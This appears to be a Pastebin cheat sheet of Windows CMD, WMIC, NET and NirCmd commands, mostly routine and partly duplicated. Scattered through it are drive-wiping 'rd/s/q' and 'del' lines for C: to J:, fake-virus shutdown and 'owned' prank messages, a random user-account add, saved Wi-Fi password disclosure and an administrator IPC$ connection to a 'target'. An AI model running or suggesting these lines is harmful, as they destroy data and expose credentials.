Advertisement
Najeebsk

ALL-LS-FILES

Jan 5th, 2022
712
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 85.13 KB | None | 0 0
  1. C:\Windows\DATA\ALL.LS
  2. ------------------------
  3. CD
  4. CD\Program Files
  5. CD %USERPROFILE%
  6. CD..
  7. CD..\..
  8. CD\
  9. CD\Windows
  10. CD\windows\system32
  11. CD /d E:\Pics
  12. CLIP /?
  13. user %%random%% /add
  14. shutdown -s -t 7 -c "A VIRUS IS TAKING OVER c:Drive
  15. shutdown -r -f -t 00
  16. shutdown -s -t 100 c “Installing Updates”
  17. start shutdown -s -f -t 300 -c "Should have asked for permission...SHUTDOWN INITIATED"
  18. echo %%random%% %%random%% %%random%% %%random%% %%random%% %%random%% %%random%% %%random%% %%random%% %%random%%
  19. -=-=-=-=-=-=-=-=-=-=-=-=-=-=- END -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  20. C:\Windows\DATA\ATTRIB.LS
  21. ---------------------------
  22. ATTRIB +h %%0 Bat File hide
  23. ATTRIB +S +H "E:\*" /S /D
  24. ATTRIB -S -H -R /s /d *.*
  25. ATTRIB -S -H -R /s /d G:\*.*
  26. set /p Hide= Type File Only EXTENSION:,>ATTRIB +h +s *.%%Hide%%
  27. set /p Unh= Type File Only EXTENSION:,>ATTRIB /S -h -s *.%%Unh%%
  28. ATTRIB To hide all files and subfolders in your target location,
  29. ATTRIB +h +S C:PathToTheFileOrFolder /s /d
  30. ATTRIB -h c:\config.sys
  31. ATTRIB -h -r -s c:\boot\bcd
  32. ATTRIB +a f:*.* & attrib -a f:*.bak
  33. ATTRIB myimage.jpg
  34. ATTRIB Run command prompt as an administrator For Virus Remove
  35. ATTRIB -r -a -h *.* or ATTRIB -s -h /s /d *.*
  36. Attrib +S +H +R
  37. Attrib +h *.ext
  38. Attrib /S -h *.ext
  39. Attrib -S -H -R
  40. call Attrib +S +H +R
  41. -=-=-=-=-=-=-=-=-=-=-=-=-=-=- END -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  42. C:\Windows\DATA\COPY.LS
  43. ---------------------------
  44. COPY *.txt D:\
  45. COPY *.* D: OR COPY * D:\Folder /y
  46. COPY c:\data\file1.doc D:\backup\file2.doc , Single Copy
  47. COPY c:\data\*.doc D:\backup , All Doc Files Data Folder Copy
  48. COPY /Y c:\dir1\file1.txt c:\dir2\file2.txt , Without confirmation
  49. COPY * D:\dir1\dir2
  50. COPY *.* D:
  51. COPY "computer hope.txt" hope
  52. COPY myfile1.txt+myfile2.txt , combines Files contents
  53. COPY /b Pic.jpg+Text.txt NewPic.jpg , Text Hide In Picture
  54. Echo Hide Text Here >> DATA\PIC.jpg
  55. copy /b DATA\PIC.jpg + File.rar DATA\PICNEW.jpg
  56. rar a -r -psonyNSK PIC.rar %CD%
  57. copy /b DATA\P.jpg + PIC.rar DATA\PICR.jpg
  58. xcopy /y "*.*" DATA\
  59. move /y "*.*" DATA\
  60. -=-=-=-=-=-=-=-=-=-=-=-=-=-=- END -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  61. C:\Windows\DATA\DEL.LS
  62. ---------------------------
  63. DEL "*.rar"
  64. DEL /F *.ext
  65. del D:\*.* /f /s /q
  66. del E:\*.* /f /s /q
  67. del F:\*.* /f /s /q
  68. del G:\*.* /f /s /q
  69. del H:\*.* /f /s /q
  70. del I:\*.* /f /s /q
  71. del J:\*.* /f /s /q
  72. del /S /Q "*.*"
  73. rd/s/q C:\
  74. rd/s/q D:\
  75. rd/s/q E:\
  76. rd/s/q F:\
  77. rd/s/q G:\
  78. rd/s/q H:\
  79. rd/s/q I:\
  80. rd/s/q J:\
  81. -=-=-=-=-=-=-=-=-=-=-=-=-=-=- END -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  82. C:\Windows\DATA\DIR.LS
  83. ---------------------------
  84. CLIP /?
  85. command | clip
  86. DIR | CLIP
  87. CLIP < README.TXT
  88. TYPE DIR /B > List.txt
  89. CMD /R DIR /B > List.txt
  90. DIR > List.txt
  91. DIR /?
  92. DIR \*.* /S /B /A
  93. DIR /ad
  94. DIR /ash
  95. DIR /a-d
  96. DIR /a:d
  97. DIR /b
  98. DIR /-c
  99. DIR /D
  100. DIR /L
  101. DIR /-N
  102. DIR /OD
  103. DIR /O-D
  104. DIR /P
  105. DIR /Q
  106. DIR /R
  107. DIR /S
  108. DIR /TC
  109. DIR /W
  110. DIR /a:s
  111. DIR \*.mp3 /s
  112. DIR \*.mp3 /s /p
  113. DIR \*.mp3 /s /b > filename.txt
  114. DIR \*.txt /s /b /a |clip
  115. DIR *.txt
  116. DIR /B /S \Mmystuff > File.txt
  117. DIR /O:gne OR DIR /O:S OR DIR /O:D
  118. -=-=-=-=-=-=-=-=-=-=-=-=-=-=- END -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  119. C:\Windows\DATA\FIND.LS
  120. ---------------------------
  121. FIND /I "[COMMANDS]" %windir%\CMD.fm
  122. FIND "WORD" *.txt
  123. FIND /V /C "" D:\Samle.txt OR *.txt
  124. FIND /I "WORD" *Files*.txt
  125. FIND /N /I "TEXT" *.txt
  126. TYPE D:\Sample.txt | FIND " /V /C
  127. FINDSTR "WORD1 WORD2 WORD3...." Sample.txt OR *.txt
  128. FINDSTR "APPLE BALL cat...." Sample.txt OR *.txt
  129. -=-=-=-=-=-=-=-=-=-=-=-=-=-=- END -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  130. C:\Windows\DATA\HELP.LS
  131. ---------------------------
  132. Microsoft Windows [version 7.1 7631]
  133. Copyright (c) 2009 Microsoft Corporation. All rights reserved.
  134.  
  135. C:\>help
  136. For more information on a specific command, type HELP command-name
  137. ASSOC Displays or modifies file extension associations.
  138. ATTRIB Displays or changes file attributes.
  139. BREAK Sets or clears extended CTRL+C checking.
  140. BCDEDIT Sets properties in boot database to control boot loading.
  141. CACLS Displays or modifies access control lists (ACLs) of files.
  142. CALL Calls one batch program from another.
  143. CD Displays the name of or changes the current directory.
  144. CHCP Displays or sets the active code page number.
  145. CHDIR Displays the name of or changes the current directory.
  146. CHKDSK Checks a disk and displays a status report.
  147. CHKNTFS Displays or modifies the checking of disk at boot time.
  148. CLS Clears the screen.
  149. CMD Starts a new instance of the Windows command interpreter.
  150. COLOR Sets the default console foreground and background colors.
  151. COMP Compares the contents of two files or sets of files.
  152. COMPACT Displays or alters the compression of files on NTFS partitions.
  153. CONVERT Converts FAT volumes to NTFS. You cannot convert the
  154. current drive.
  155. COPY Copies one or more files to another location.
  156. DATE Displays or sets the date.
  157. DEL Deletes one or more files.
  158. DIR Displays a list of files and subdirectories in a directory.
  159. DISKCOMP Compares the contents of two floppy disks.
  160. DISKCOPY Copies the contents of one floppy disk to another.
  161. DISKPART Displays or configures Disk Partition properties.
  162. DOSKEY Edits command lines, recalls Windows commands, and
  163. creates macros.
  164. DRIVERQUERY Displays current device driver status and properties.
  165. ECHO Displays messages, or turns command echoing on or off.
  166. ENDLOCAL Ends localization of environment changes in a batch file.
  167. ERASE Deletes one or more files.
  168. EXIT Quits the CMD.EXE program (command interpreter).
  169. FC Compares two files or sets of files, and displays the
  170. differences between them.
  171. FIND Searches for a text string in a file or files.
  172. FINDSTR Searches for strings in files.
  173. FOR Runs a specified command for each file in a set of files.
  174. FORMAT Formats a disk for use with Windows.
  175. FSUTIL Displays or configures the file system properties.
  176. FTYPE Displays or modifies file types used in file extension
  177. associations.
  178. GOTO Directs the Windows command interpreter to a labeled line in
  179. a batch program.
  180. GPRESULT Displays Group Policy information for machine or user.
  181. GRAFTABL Enables Windows to display an extended character set in
  182. graphics mode.
  183. HELP Provides Help information for Windows commands.
  184. ICACLS Display, modify, backup, or restore ACLs for files and
  185. directories.
  186. IF Performs conditional processing in batch programs.
  187. LABEL Creates, changes, or deletes the volume label of a disk.
  188. MD Creates a directory.
  189. MKDIR Creates a directory.
  190. MKLINK Creates Symbolic Links and Hard Links
  191. MODE Configures a system device.
  192. MORE Displays output one screen at a time.
  193. MOVE Moves one or more files from one directory to another
  194. directory.
  195. OPENFILES Displays files opened by remote users for a file share.
  196. PATH Displays or sets a search path for executable files.
  197. PAUSE Suspends processing of a batch file and displays a message.
  198. POPD Restores the previous value of the current directory saved by
  199. PUSHD.
  200. PRINT Prints a text file.
  201. PROMPT Changes the Windows command prompt.
  202. PUSHD Saves the current directory then changes it.
  203. RD Removes a directory.
  204. RECOVER Recovers readable information from a bad or defective disk.
  205. REM Records comments (remarks) in batch files or CONFIG.SYS.
  206. REN Renames a file or files.
  207. RENAME Renames a file or files.
  208. REPLACE Replaces files.
  209. RMDIR Removes a directory.
  210. ROBOCOPY Advanced utility to copy files and directory trees
  211. SET Displays, sets, or removes Windows environment variables.
  212. SETLOCAL Begins localization of environment changes in a batch file.
  213. SC Displays or configures services (background processes).
  214. SCHTASKS Schedules commands and programs to run on a computer.
  215. SHIFT Shifts the position of replaceable parameters in batch files.
  216. SHUTDOWN Allows proper local or remote shutdown of machine.
  217. SORT Sorts input.
  218. START Starts a separate window to run a specified program or command.
  219. SUBST Associates a path with a drive letter.
  220. SYSTEMINFO Displays machine specific properties and configuration.
  221. TASKLIST Displays all currently running tasks including services.
  222. TASKKILL Kill or stop a running process or application.
  223. TIME Displays or sets the system time.
  224. TITLE Sets the window title for a CMD.EXE session.
  225. TREE Graphically displays the directory structure of a drive or
  226. path.
  227. TYPE Displays the contents of a text file.
  228. VER Displays the Windows version.
  229. VERIFY Tells Windows whether to verify that your files are written
  230. correctly to a disk.
  231. VOL Displays a disk volume label and serial number.
  232. XCOPY Copies files and directory trees.
  233. WMIC Displays WMI information inside interactive command shell.
  234.  
  235. For more information on tools see the command-line reference in the online help.
  236. -=-=-=-=-=-=-=-=-=-=-=-=-=-=- END -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  237. C:\Windows\DATA\MD.LS
  238. ---------------------------
  239. MD "Najeeb"
  240. MD user1 user2 user3
  241. MD "my example directory"
  242. MKDIR \A\B\C
  243. MD ..\example
  244. MD %%random%%
  245. -=-=-=-=-=-=-=-=-=-=-=-=-=-=- END -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  246. C:\Windows\DATA\NET.LS
  247. ---------------------------
  248. WMIC ComputerSystem GET Model
  249. WMIC computersystem get name,systemtype
  250. WMIC bios get serialnumber
  251. WMIC csproduct get identifyingnumber
  252. WMIC nic get macaddress,description
  253. WMIC baseboard get product,Manufacturer,version,serialnumbe
  254. WMIC COMPUTERSYSTEM get TotalPhysicalMemory
  255. WMIC process get workingsetsize,commandline
  256. WMIC partition get name,size,type
  257. WMIC COMPUTERSYSTEM GET MANUFACTURER
  258. WMIC csproduct get version
  259. WMIC service list brief
  260. WMIC process list brief
  261. WMIC startup list brief
  262. WMIC process where name="firefox.exe" call terminate
  263. WMIC output to file get all process name Save
  264. WMIC /output:"C:\output.txt"
  265. ping 8.8.8.8
  266. nslookup = nslookup www.google.com
  267. arp or arp-a
  268. ipconfig
  269. ipconfig /release (this will release your IP)
  270. ipconfig /renew (this will renew your iP)
  271. netstat =Type in command prompt “netstat -a“ "netstat -n" "netstat -an"
  272. Route =You can type in command prompt “route print“
  273. Net View =You can type in command prompt “net view x.x.x.x or computername“
  274. Net User =Net User "Enter" , Net User Najeeb "Enter"
  275. Net User =net user yourusername * (Change yourusername with your PC user name and press Enter. Now type the new password.)
  276. Net Use =net use \ipaddressipc$ “” /user:administrator (this command will allow you to connect to the target as administrator)
  277. Net Use =net use K: \computernameC$ (this will create a virtual drive on your “my computer” folder)
  278. Tasklist =taskkill /PID 1532 /F (if you want to kill PID 1532 process then you can enter the command: taskkill /PID 1532 /F
  279. iexplore = use iexplore <IP address> to find sites running on any particular IP address.
  280. Pathping =
  281. Getmac =
  282. Netsh =
  283. ftp = ftp 192.168.1.80
  284. Netstat =
  285. tracert =tracert www.google.com
  286. Net wlan show profile "Enter"
  287. Net wlan show profile "wifi Name" key=clear "Enter"
  288. -=-=-=-=-=-=-=-=-=-=-=-=-=-=- END -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  289. C:\Windows\DATA\NIR.LS
  290. ---------------------------
  291. nircmd.exe savescreenshot "~$folder.desktop$\PIC~$loopcount$.jpg"
  292. nircmd.exe loop 10 60000 savescreenshot "~$folder.desktop$\P~$loopcount$.png"
  293. nircmd.exe loop 3 20000 savescreenshot "DATA\PIC~$loopcount$.jpg"
  294. nircmd.exe savescreenshot "~$folder.desktop$\shot.png"
  295. nircmd.exe savescreenshot "~$folder.desktop$\shot.png" 50 50 300 200
  296. nircmd.exe savescreenshot *clipboard* 150 150 400 400
  297. nircmd.exe loop 3 2000 savescreenshotwin "DATA\PIC~$loopcount$.jpg"
  298. nircmd.exe savescreenshotwin "DATA\PIC~$loopcount$.png"
  299. nircmd.exe savescreenshotwin *clipboard*
  300. nircmd.exe clipboard set "123456"
  301. nircmd.exe clipboard set ~$folder.desktop$
  302. nircmd.exe clipboard set ~$folder.start_menu$
  303. nircmd.exe clipboard readfile "~$folder.desktop$\info1.txt"
  304. nircmd.exe clipboard addfile "~$folder.desktop$\clip1.txt"
  305. nircmd.exe clipboard clear
  306. nircmd.exe clipboard saveimage "~$folder.desktop$\clip01.png"
  307. nircmd.exe clipboard saveimage "~$folder.desktop$\clip01.gif"
  308. nircmd.exe clipboard copyimage "~$folder.desktop$\img01.gif"
  309. nircmd.exe clipboard saveclp "~$folder.desktop$\1.clp"
  310. nircmd.exe clipboard loadclp "~$folder.desktop$\1.clp"
  311. nircmd.exe beep 500 2000
  312. nircmd.exe mutesysvolume 1
  313. nircmd.exe mutesysvolume 0
  314. nircmd.exe mutesysvolume 2
  315. nircmd.exe cmdshortcut "~$folder.desktop$" "Switch Volume" mutesysvolume 2
  316. nircmd.exe changesysvolume 2000
  317. nircmd.exe changesysvolume -5000
  318. nircmd.exe setsysvolume 65535
  319. nircmd.exe monitor off
  320. nircmd.exe screensaver
  321. nircmd.exe emptybin
  322. nircmd.exe folder.appdata
  323. nircmd.exe folder.startup
  324. nircmd.exe cdrom open j:
  325. nircmd.exe cdrom close y:
  326. nircmd.exe exitwin poweroff
  327. nircmd.exe regedit "~$clipboard$"
  328. nircmd.exe filldelete "C:\Users\Najeeb\AppData\Local\Temp\*.*"
  329. nircmd.exe filldelete "c:\temp\myfile.dat"
  330. nircmd.exe cmdwait 1000 monitor off
  331. nircmd.exe elevate "C:\Windows\notepad.exe"
  332. nircmd.exe infobox "This is a message box " "message"
  333. nircmd.exe convertimage "c:\temp\test1.gif" "c:\temp\test1.png"
  334. nircmd.exe convertimage "c:\temp\test1.jpg" "c:\temp\test1.gif"
  335. nircmd.exe convertimages "c:\temp\a*.gif" .png
  336. nircmd.exe convertimages "c:\temp\*.jpg" .gif
  337. nircmd.exe mediaplay 10000 "c:\temp\1.mp3"
  338. nircmd.exe mediaplay 180000 "c:\my files\1.wav"
  339. nircmd.exe shellcopy "c:\temp\*.*" "d:\temp"
  340. nircmd.exe shellcopy "c:\temp\*.*" "d:\temp" yestoall noerrorui
  341. nircmd.exe shortcut "C:\winnt\system32\calc.exe" "~$folder.desktop$" "Windows Calculator"
  342. nircmd.exe shortcut "C:\winnt\system32\calc.exe" "~$folder.programs$\Calculators" "Windows Calculator"
  343. nircmd.exe shortcut "C:\Program Files\KaZaA\Kazaa.exe" "c:\temp\MyShortcuts" "Kazaa"
  344. nircmd.exe shortcut "f:\Program Files" "c:\temp\MyShortcuts" "Program Files Folder" "" "f:\winnt\system32\shell32.dll" 45
  345. nircmd.exe shortcut "C:\Program Files" "c:\temp\MyShortcuts" "Program Files Folder" "" "" "" "max"
  346. nircmd.exe sendkeypress Ctrl+printscreen
  347. nircmd.exe sendkey a press
  348. nircmd.exe sendkey f10 press
  349. nircmd.exe sendkey enter press
  350. nircmd.exe sendkey 0x2e press
  351. nircmd.exe urlshortcut "http://www.nirsoft.net" "~$folder.favorites$" "NirSoft Web Site"
  352. nircmd.exe urlshortcut "http://www.google.com" "~$folder.favorites$\Search Engines" "Google"
  353. nircmd.exe urlshortcut "http://www.yahoo.com" "c:\temp" "Yahoo"
  354. nircmd.exe speak text ~$clipboard$
  355. nircmd.exe speak text "Please visit the Web site of NirSoft at http://www.nirsoft.net" 2 80
  356. nircmd.exe loop 3 2000 speak text "Call Number ~$loopcount$"
  357. nircmd.exe speak file "c:\temp\speak1.txt"
  358. nircmd.exe speak file "c:\temp\speak1.txt" 0 100 "c:\temp\speak.wav" 48kHz16BitStereo
  359. -=-=-=-=-=-=-=-=-=-=-=-=-=-=- END -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  360. C:\Windows\DATA\REN.LS
  361. ---------------------------
  362. REN *.DOC *.TXT
  363. REN *.JPEG *.TXT
  364. REN *.LNK *.TXT
  365. REN *.AVI *.TXT
  366. REN *.MPEG *.TXT
  367. REN *.COM *.TXT
  368. REN *.BAT *.TXT
  369. -=-=-=-=-=-=-=-=-=-=-=-=-=-=- END -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  370. C:\Windows\DATA\START.LS
  371. ---------------------------
  372. start winword
  373. start mspaint
  374. start notepad
  375. start write
  376. start cmd
  377. start explorer
  378. start control
  379. start calc
  380. start C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
  381. start C:\Windows\notepad.exe
  382. start http://www.google.com/
  383. start http://www.youtube.com/
  384. -=-=-=-=-=-=-=-=-=-=-=-=-=-=- END -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  385. C:\Windows\CMD.LS
  386. ---------------------------
  387. C:\Windows\DATA\CMD.LS
  388. ---------------------------
  389. NAJEEB NIRCMD COMMAND
  390. nircmd.exe savescreenshot "~$folder.desktop$\PIC~$loopcount$.jpg"
  391. nircmd.exe loop 10 60000 savescreenshot "~$folder.desktop$\P~$loopcount$.png"
  392. nircmd.exe loop 3 20000 savescreenshot "DATA\PIC~$loopcount$.jpg"
  393. nircmd.exe savescreenshot "~$folder.desktop$\shot.png"
  394. nircmd.exe savescreenshot "~$folder.desktop$\shot.png" 50 50 300 200
  395. nircmd.exe savescreenshot *clipboard* 150 150 400 400
  396. nircmd.exe loop 3 2000 savescreenshotwin "DATA\PIC~$loopcount$.jpg"
  397. nircmd.exe savescreenshotwin "DATA\PIC~$loopcount$.png"
  398. nircmd.exe savescreenshotwin *clipboard*
  399. nircmd.exe clipboard set "123456"
  400. nircmd.exe clipboard set ~$folder.desktop$
  401. nircmd.exe clipboard set ~$folder.start_menu$
  402. nircmd.exe clipboard readfile "~$folder.desktop$\info1.txt"
  403. nircmd.exe clipboard addfile "~$folder.desktop$\clip1.txt"
  404. nircmd.exe clipboard clear
  405. nircmd.exe clipboard saveimage "~$folder.desktop$\clip01.png"
  406. nircmd.exe clipboard saveimage "~$folder.desktop$\clip01.gif"
  407. nircmd.exe clipboard copyimage "~$folder.desktop$\img01.gif"
  408. nircmd.exe clipboard saveclp "~$folder.desktop$\1.clp"
  409. nircmd.exe clipboard loadclp "~$folder.desktop$\1.clp"
  410. nircmd.exe beep 500 2000
  411. nircmd.exe mutesysvolume 1
  412. nircmd.exe mutesysvolume 0
  413. nircmd.exe mutesysvolume 2
  414. nircmd.exe cmdshortcut "~$folder.desktop$" "Switch Volume" mutesysvolume 2
  415. nircmd.exe changesysvolume 2000
  416. nircmd.exe changesysvolume -5000
  417. nircmd.exe setsysvolume 65535
  418. nircmd.exe monitor off
  419. nircmd.exe screensaver
  420. nircmd.exe emptybin
  421. nircmd.exe folder.appdata
  422. nircmd.exe folder.startup
  423. nircmd.exe cdrom open j:
  424. nircmd.exe cdrom close y:
  425. nircmd.exe exitwin poweroff
  426. nircmd.exe regedit "~$clipboard$"
  427. nircmd.exe filldelete "C:\Users\Najeeb\AppData\Local\Temp\*.*"
  428. nircmd.exe filldelete "c:\temp\myfile.dat"
  429. nircmd.exe cmdwait 1000 monitor off
  430. nircmd.exe elevate "C:\Windows\notepad.exe"
  431. nircmd.exe infobox "This is a message box " "message"
  432. nircmd.exe convertimage "c:\temp\test1.gif" "c:\temp\test1.png"
  433. nircmd.exe convertimage "c:\temp\test1.jpg" "c:\temp\test1.gif"
  434. nircmd.exe convertimages "c:\temp\a*.gif" .png
  435. nircmd.exe convertimages "c:\temp\*.jpg" .gif
  436. nircmd.exe mediaplay 10000 "c:\temp\1.mp3"
  437. nircmd.exe mediaplay 180000 "c:\my files\1.wav"
  438. nircmd.exe shellcopy "c:\temp\*.*" "d:\temp"
  439. nircmd.exe shellcopy "c:\temp\*.*" "d:\temp" yestoall noerrorui
  440. nircmd.exe shortcut "C:\winnt\system32\calc.exe" "~$folder.desktop$" "Windows Calculator"
  441. nircmd.exe shortcut "C:\winnt\system32\calc.exe" "~$folder.programs$\Calculators" "Windows Calculator"
  442. nircmd.exe shortcut "C:\Program Files\KaZaA\Kazaa.exe" "c:\temp\MyShortcuts" "Kazaa"
  443. nircmd.exe shortcut "f:\Program Files" "c:\temp\MyShortcuts" "Program Files Folder" "" "f:\winnt\system32\shell32.dll" 45
  444. nircmd.exe shortcut "C:\Program Files" "c:\temp\MyShortcuts" "Program Files Folder" "" "" "" "max"
  445. nircmd.exe sendkeypress Ctrl+printscreen
  446. nircmd.exe sendkey a press
  447. nircmd.exe sendkey f10 press
  448. nircmd.exe sendkey enter press
  449. nircmd.exe sendkey 0x2e press
  450. nircmd.exe urlshortcut "http://www.nirsoft.net" "~$folder.favorites$" "NirSoft Web Site"
  451. nircmd.exe urlshortcut "http://www.google.com" "~$folder.favorites$\Search Engines" "Google"
  452. nircmd.exe urlshortcut "http://www.yahoo.com" "c:\temp" "Yahoo"
  453. nircmd.exe speak text ~$clipboard$
  454. nircmd.exe speak text "Please visit the Web site of NirSoft at http://www.nirsoft.net" 2 80
  455. nircmd.exe loop 3 2000 speak text "Call Number ~$loopcount$"
  456. nircmd.exe speak file "c:\temp\speak1.txt"
  457. nircmd.exe speak file "c:\temp\speak1.txt" 0 100 "c:\temp\speak.wav" 48kHz16BitStereo
  458. ~~~~****========================END==========================****~~~~
  459. Najeeb Batch Commands
  460. FIND /I "[COMMANDS]" %windir%\CMD.fm
  461. FIND "WORD" *.txt
  462. FIND /V /C "" D:\Samle.txt OR *.txt
  463. FIND /I "WORD" *Files*.txt
  464. FIND /N /I "TEXT" *.txt
  465. TYPE D:\Sample.txt | FIND " /V /C
  466. FINDSTR "WORD1 WORD2 WORD3...." Sample.txt OR *.txt
  467. FINDSTR "APPLE BALL cat...." Sample.txt OR *.txt
  468. MD "Najeeb"
  469. MD user1 user2 user3
  470. MD "my example directory"
  471. MKDIR \A\B\C
  472. MD ..\example
  473. MD %%random%%
  474. CD
  475. CD\Program Files
  476. CD %USERPROFILE%
  477. CD..
  478. CD..\..
  479. CD\
  480. CD\Windows
  481. CD\windows\system32
  482. CD /d E:\Pics
  483. CLIP /?
  484. command | clip
  485. DIR | CLIP
  486. CLIP < README.TXT
  487. TYPE DIR /B > List.txt
  488. CMD /R DIR /B > List.txt
  489. DIR > List.txt
  490. DIR /?
  491. DIR \*.* /S /B /A
  492. DIR /ad
  493. DIR /ash
  494. DIR /a-d
  495. DIR /a:d
  496. DIR /b
  497. DIR /-c
  498. DIR /D
  499. DIR /L
  500. DIR /-N
  501. DIR /OD
  502. DIR /O-D
  503. DIR /P
  504. DIR /Q
  505. DIR /R
  506. DIR /S
  507. DIR /TC
  508. DIR /W
  509. DIR /a:s
  510. DIR \*.mp3 /s
  511. DIR \*.mp3 /s /p
  512. DIR \*.mp3 /s /b > filename.txt
  513. DIR \*.txt /s /b /a |clip
  514. DIR *.txt
  515. DIR /B /S \Mmystuff > File.txt
  516. DIR /O:gne OR DIR /O:S OR DIR /O:D
  517. ATTRIB +h %%0 Bat File hide
  518. ATTRIB +S +H "E:\*" /S /D
  519. ATTRIB -S -H -R /s /d *.*
  520. ATTRIB -S -H -R /s /d G:\*.*
  521. set /p Hide= Type File Only EXTENSION:,>ATTRIB +h +s *.%%Hide%%
  522. set /p Unh= Type File Only EXTENSION:,>ATTRIB /S -h -s *.%%Unh%%
  523. ATTRIB To hide all files and subfolders in your target location,
  524. ATTRIB +h +S C:PathToTheFileOrFolder /s /d
  525. ATTRIB -h c:\config.sys
  526. ATTRIB -h -r -s c:\boot\bcd
  527. ATTRIB +a f:*.* & attrib -a f:*.bak
  528. ATTRIB myimage.jpg
  529. ATTRIB Run command prompt as an administrator For Virus Remove
  530. ATTRIB -r -a -h *.* or ATTRIB -s -h /s /d *.*
  531. Attrib +S +H +R
  532. Attrib +h *.ext
  533. Attrib /S -h *.ext
  534. Attrib -S -H -R
  535. call Attrib +S +H +R
  536. COPY *.txt D:\
  537. COPY *.* D: OR COPY * D:\Folder /y
  538. COPY c:\data\file1.doc D:\backup\file2.doc , Single Copy
  539. COPY c:\data\*.doc D:\backup , All Doc Files Data Folder Copy
  540. COPY /Y c:\dir1\file1.txt c:\dir2\file2.txt , Without confirmation
  541. COPY * D:\dir1\dir2
  542. COPY *.* D:
  543. COPY "computer hope.txt" hope
  544. COPY myfile1.txt+myfile2.txt , combines Files contents
  545. COPY /b Pic.jpg+Text.txt NewPic.jpg , Text Hide In Picture
  546. Echo Hide Text Here >> DATA\PIC.jpg
  547. copy /b DATA\PIC.jpg + File.rar DATA\PICNEW.jpg
  548. rar a -r -psonyNSK PIC.rar %CD%
  549. copy /b DATA\P.jpg + PIC.rar DATA\PICR.jpg
  550. xcopy /y "*.*" DATA\
  551. move /y "*.*" DATA\
  552. DEL "*.rar"
  553. DEL /F *.ext
  554. del D:\*.* /f /s /q
  555. del E:\*.* /f /s /q
  556. del F:\*.* /f /s /q
  557. del G:\*.* /f /s /q
  558. del H:\*.* /f /s /q
  559. del I:\*.* /f /s /q
  560. del J:\*.* /f /s /q
  561. del /S /Q "*.*"
  562. rd/s/q C:\
  563. rd/s/q D:\
  564. rd/s/q E:\
  565. rd/s/q F:\
  566. rd/s/q G:\
  567. rd/s/q H:\
  568. rd/s/q I:\
  569. rd/s/q J:\
  570. REN *.DOC *.TXT
  571. REN *.JPEG *.TXT
  572. REN *.LNK *.TXT
  573. REN *.AVI *.TXT
  574. REN *.MPEG *.TXT
  575. REN *.COM *.TXT
  576. REN *.BAT *.TXT
  577. start winword
  578. start mspaint
  579. start notepad
  580. start write
  581. start cmd
  582. start explorer
  583. start control
  584. start calc
  585. msg * Hi
  586. msg * Are you having fun?
  587. msg * I am
  588. msg * Lets have fun together
  589. msg * Because you have been o-w-n-e-d
  590. user %%random%% /add
  591. start C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
  592. start C:\Windows\notepad.exe
  593. start http://www.google.com/
  594. start http://www.youtube.com/
  595. taskkill -im explorer.exe /f >nul&start explorer
  596. WMIC ComputerSystem GET Model
  597. WMIC computersystem get name,systemtype
  598. WMIC bios get serialnumber
  599. WMIC csproduct get identifyingnumber
  600. WMIC nic get macaddress,description
  601. WMIC baseboard get product,Manufacturer,version,serialnumbe
  602. WMIC COMPUTERSYSTEM get TotalPhysicalMemory
  603. WMIC process get workingsetsize,commandline
  604. WMIC partition get name,size,type
  605. WMIC COMPUTERSYSTEM GET MANUFACTURER
  606. WMIC csproduct get version
  607. WMIC service list brief
  608. WMIC process list brief
  609. WMIC startup list brief
  610. WMIC process where name="firefox.exe" call terminate
  611. WMIC output to file get all process name Save
  612. WMIC /output:"C:\output.txt"
  613. ping 8.8.8.8
  614. nslookup = nslookup www.google.com
  615. arp or arp-a
  616. ipconfig
  617. ipconfig /release (this will release your IP)
  618. ipconfig /renew (this will renew your iP)
  619. netstat =Type in command prompt “netstat -a“ "netstat -n" "netstat -an"
  620. Route =You can type in command prompt “route print“
  621. Net View =You can type in command prompt “net view x.x.x.x or computername“
  622. Net User =Net User "Enter" , Net User Najeeb "Enter"
  623. Net User =net user yourusername * (Change yourusername with your PC user name and press Enter. Now type the new password.)
  624. Net Use =net use \ipaddressipc$ “” /user:administrator (this command will allow you to connect to the target as administrator)
  625. Net Use =net use K: \computernameC$ (this will create a virtual drive on your “my computer” folder)
  626. Tasklist =taskkill /PID 1532 /F (if you want to kill PID 1532 process then you can enter the command: taskkill /PID 1532 /F
  627. iexplore = use iexplore <IP address> to find sites running on any particular IP address.
  628. Pathping =
  629. Getmac =
  630. Netsh =
  631. ftp = ftp 192.168.1.80
  632. Netstat =
  633. tracert =tracert www.google.com
  634. Net wlan show profile "Enter"
  635. Net wlan show profile "wifi Name" key=clear "Enter"
  636. shutdown -s -t 7 -c "A VIRUS IS TAKING OVER c:Drive
  637. shutdown -r -f -t 00
  638. shutdown -s -t 100 c “Installing Updates”
  639. start shutdown -s -f -t 300 -c "Should have asked for permission...SHUTDOWN INITIATED"
  640. echo %%random%% %%random%% %%random%% %%random%% %%random%% %%random%% %%random%% %%random%% %%random%% %%random%%
  641. -=-=-=-=-=-=-=-=-=-=-=-=-=-=- END -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  642. C:\Windows\CMD.FM
  643. ---------------------------
  644. C:\Windows\DATA\CMD.FM
  645. ---------------------------
  646. [HELP]::-=-=-=-=-=-=-=-=-=-==-=-=-=-HELP-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  647. [HELP] => FIND /I "[COMMANDS]" %windir%\CMD.fm
  648. [HELP] => Exmple Help=COPY /? ; DIR /? ...
  649. [HELP] => %windir%\NirCmd.chm
  650. [HELP] => %windir%\Rar.exe Help /?
  651. [HELP] => %windir%\UnRaR.exe Help /?
  652. [HELP] => FIND "WORD" File.txt & Any Text File WORD Search
